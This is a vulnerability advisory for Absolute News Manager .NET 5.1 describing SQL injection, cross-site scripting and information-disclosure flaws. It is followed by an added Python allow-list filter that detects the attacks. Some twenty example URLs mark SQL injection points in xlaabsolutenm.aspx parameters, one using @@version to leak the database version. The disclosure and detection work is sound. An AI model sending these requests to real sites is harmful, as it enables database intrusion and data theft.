source: https://www.securityfocus.com/bid/26692/info
Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues.
Attackers can exploit these issues to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, obtain sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Absolute News Manager .NET 5.1; other versions may also be vulnerable.
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=@@version&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc&sort=headline'INJECTED_PAYLOAD&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc'INJECTED_PAYLOAD&sort=headline&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10'INJECTED_PAYLOAD&ord=asc&sort=headline&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=15'INJECTED_PAYLOAD&ss=y&size=1.1em&target=iframe&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc&sort=headline'INJECTED_PAYLOAD&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc'INJECTED_PAYLOAD&sort=headline&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21'INJECTED_PAYLOAD&ord=asc&sort=headline&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4'INJECTED_PAYLOAD&pz=21&ord=asc&sort=headline&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc&sort=posted'INJECTED_PAYLOAD&featured=n&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc'INJECTED_PAYLOAD&sort=posted&featured=n&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=8'INJECTED_PAYLOAD&featured=only&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc&sort=posted'INJECTED_PAYLOAD&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc'INJECTED_PAYLOAD&sort=posted&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9'INJECTED_PAYLOAD&featured=n&ord=desc&sort=posted&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&ord=desc&sort=posted&featured=n&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=8&featured=only&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc&sort=posted'INJECTED_PAYLOAD&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc'INJECTED_PAYLOAD&sort=posted&
http://www.example.com/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7'INJECTED_PAYLOAD&ord=desc&sort=posted&
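
Added example (not part of the original advisory and not the vendor's code): an allow-list check for the z, pz, ord, sort and featured parameters of xlaabsolutenm.aspx, usable as a request filter or as a detection pass over access logs. The allowed values are an assumption inferred from the benign values in the URLs above; the function name `violations` and the "/news/" directory are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

PAGE = "xlaabsolutenm.aspx"
_INT = re.compile(r"[0-9]{1,9}")


def _is_int(value):
    return _INT.fullmatch(value) is not None


# Allow-lists inferred from the benign values in the advisory's URLs
# (assumption: a real deployment may accept more values; extend as needed).
RULES = {
    "z": _is_int,
    "pz": _is_int,
    "ord": lambda v: v.lower() in {"asc", "desc"},
    "sort": lambda v: v.lower() in {"headline", "posted"},
    "featured": lambda v: v.lower() in {"n", "only"},
}


def violations(url):
    """Return the sorted names of parameters whose value fails its allow-list."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/" + PAGE):
        return []  # not a request to the affected page
    bad = set()
    # parse_qsl percent-decodes, so an encoded quote (%27) is checked too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        check = RULES.get(name.lower())
        if check is not None and not check(value):
            bad.add(name.lower())
    return sorted(bad)


# Constructed sample requests ("/news/" stands in for [CustomerDefinedDir]).
BASE = "http://www.example.com/news/xlaabsolutenm.aspx?"
SAMPLES = [
    BASE + "z=10&ord=asc&sort=headline&rmore=-&",
    BASE + "z=@@version&pz=9&featured=n&ord=desc&sort=posted&rmore=-&",
    BASE + "z=10&ord=asc&sort=headline%27INJECTED_PAYLOAD&rmore=-&",
    BASE + "z=6&pz=9'INJECTED_PAYLOAD&featured=n&ord=desc'INJECTED_PAYLOAD&",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(violations(url) or "ok", url)
```

Rejecting or logging any request for which `violations` returns a non-empty list covers every URL pattern listed above, including the `z=@@version` case.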